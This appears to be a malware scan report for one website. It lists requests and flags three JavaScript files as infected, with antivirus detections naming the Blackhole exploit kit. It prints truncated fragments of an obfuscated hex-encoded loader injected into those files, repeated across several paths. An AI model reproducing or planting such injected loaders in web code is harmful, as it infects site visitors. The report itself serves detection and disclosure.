Request | Server response | Status |
http://iwetechnology.com/ | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/./include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
/**
 * Global shorthand that forwards to URL.getSessionPair.
 *
 * NOTE(review): `URL` is presumably the site's own helper object defined in the
 * part of url.js not shown in this excerpt, not the browser's built-in URL
 * constructor — confirm against a clean copy of the file.
 *
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand that forwards to URL.getSessionHref.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand that forwards to URL.processLinkz and returns nothing.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}
/**
 * Global shorthand that forwards to URL.getSessionString.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand that forwards to URL.jdecode.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Create the `deconcept` namespace and its `util` / `SWFObjectUtil` members
// only when they do not exist yet, so an earlier definition is left in place.
if (typeof deconcept === "undefined") {
  var deconcept = {};
}
if (typeof deconcept.util === "undefined") {
  deconcept.util = {};
}
if (typeof deconcept.SWFObjectUtil === "undefined") {
  deconcept.SWFObjectUtil = {};
}
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./include/sitetree.js | 200 OK Content-Length: 11259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Fallback for engines that lack a native decodeURIComponent: install a global
// that defers to unescape(). unescape() maps each %XX to a single character
// code and does not reassemble UTF-8 sequences, so non-ASCII input decodes
// differently from the native function.
if (typeof decodeURIComponent === 'undefined') {
  decodeURIComponent = function (encoded) {
    return unescape(encoded);
  };
}
/**
 * Decodes a percent-encoded string in which '+' stands for a space.
 *
 * Every '+' is first rewritten to '%20'; the result is then handed to
 * decodeURIComponent, so a literal plus sign must arrive as '%2B'.
 *
 * @param {string} s - encoded text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withEncodedSpaces = s.replace(/\+/g, "%20");
  return decodeURIComponent(withEncodedSpaces);
}
// Position constants 0..7.
// NOTE(review): presumably indices into each node array of `theSitetree`;
// the array literal is truncated in this excerpt, so confirm against a clean copy.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;
var theSitetree=[
['
... 3272 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./6101.html | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/././include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
/**
 * Global shorthand that forwards to URL.getSessionPair.
 *
 * NOTE(review): `URL` is presumably the site's own helper object defined in the
 * part of url.js not shown in this excerpt, not the browser's built-in URL
 * constructor — confirm against a clean copy of the file.
 *
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand that forwards to URL.getSessionHref.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand that forwards to URL.processLinkz and returns nothing.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}
/**
 * Global shorthand that forwards to URL.getSessionString.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand that forwards to URL.jdecode.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Create the `deconcept` namespace and its `util` / `SWFObjectUtil` members
// only when they do not exist yet, so an earlier definition is left in place.
if (typeof deconcept === "undefined") {
  var deconcept = {};
}
if (typeof deconcept.util === "undefined") {
  deconcept.util = {};
}
if (typeof deconcept.SWFObjectUtil === "undefined") {
  deconcept.SWFObjectUtil = {};
}
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././include/sitetree.js | 200 OK Content-Length: 11259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Fallback for engines that lack a native decodeURIComponent: install a global
// that defers to unescape(). unescape() maps each %XX to a single character
// code and does not reassemble UTF-8 sequences, so non-ASCII input decodes
// differently from the native function.
if (typeof decodeURIComponent === 'undefined') {
  decodeURIComponent = function (encoded) {
    return unescape(encoded);
  };
}
/**
 * Decodes a percent-encoded string in which '+' stands for a space.
 *
 * Every '+' is first rewritten to '%20'; the result is then handed to
 * decodeURIComponent, so a literal plus sign must arrive as '%2B'.
 *
 * @param {string} s - encoded text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withEncodedSpaces = s.replace(/\+/g, "%20");
  return decodeURIComponent(withEncodedSpaces);
}
// Position constants 0..7.
// NOTE(review): presumably indices into each node array of `theSitetree`;
// the array literal is truncated in this excerpt, so confirm against a clean copy.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;
var theSitetree=[
['
... 3272 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././6101.html | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/./././include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
/**
 * Global shorthand that forwards to URL.getSessionPair.
 *
 * NOTE(review): `URL` is presumably the site's own helper object defined in the
 * part of url.js not shown in this excerpt, not the browser's built-in URL
 * constructor — confirm against a clean copy of the file.
 *
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand that forwards to URL.getSessionHref.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand that forwards to URL.processLinkz and returns nothing.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}
/**
 * Global shorthand that forwards to URL.getSessionString.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand that forwards to URL.jdecode.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./././include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Create the `deconcept` namespace and its `util` / `SWFObjectUtil` members
// only when they do not exist yet, so an earlier definition is left in place.
if (typeof deconcept === "undefined") {
  var deconcept = {};
}
if (typeof deconcept.util === "undefined") {
  deconcept.util = {};
}
if (typeof deconcept.SWFObjectUtil === "undefined") {
  deconcept.SWFObjectUtil = {};
}
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./././include/sitetree.js | 200 OK Content-Length: 11259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Fallback for engines that lack a native decodeURIComponent: install a global
// that defers to unescape(). unescape() maps each %XX to a single character
// code and does not reassemble UTF-8 sequences, so non-ASCII input decodes
// differently from the native function.
if (typeof decodeURIComponent === 'undefined') {
  decodeURIComponent = function (encoded) {
    return unescape(encoded);
  };
}
/**
 * Decodes a percent-encoded string in which '+' stands for a space.
 *
 * Every '+' is first rewritten to '%20'; the result is then handed to
 * decodeURIComponent, so a literal plus sign must arrive as '%2B'.
 *
 * @param {string} s - encoded text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withEncodedSpaces = s.replace(/\+/g, "%20");
  return decodeURIComponent(withEncodedSpaces);
}
// Position constants 0..7.
// NOTE(review): presumably indices into each node array of `theSitetree`;
// the array literal is truncated in this excerpt, so confirm against a clean copy.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;
var theSitetree=[
['
... 3272 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./././6101.html | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/././././include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
/**
 * Global shorthand that forwards to URL.getSessionPair.
 *
 * NOTE(review): `URL` is presumably the site's own helper object defined in the
 * part of url.js not shown in this excerpt, not the browser's built-in URL
 * constructor — confirm against a clean copy of the file.
 *
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand that forwards to URL.getSessionHref.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand that forwards to URL.processLinkz and returns nothing.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}
/**
 * Global shorthand that forwards to URL.getSessionString.
 * `URL` is defined outside this excerpt.
 *
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand that forwards to URL.jdecode.
 * `URL` is defined outside this excerpt.
 *
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././././include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Create the `deconcept` namespace and its `util` / `SWFObjectUtil` members
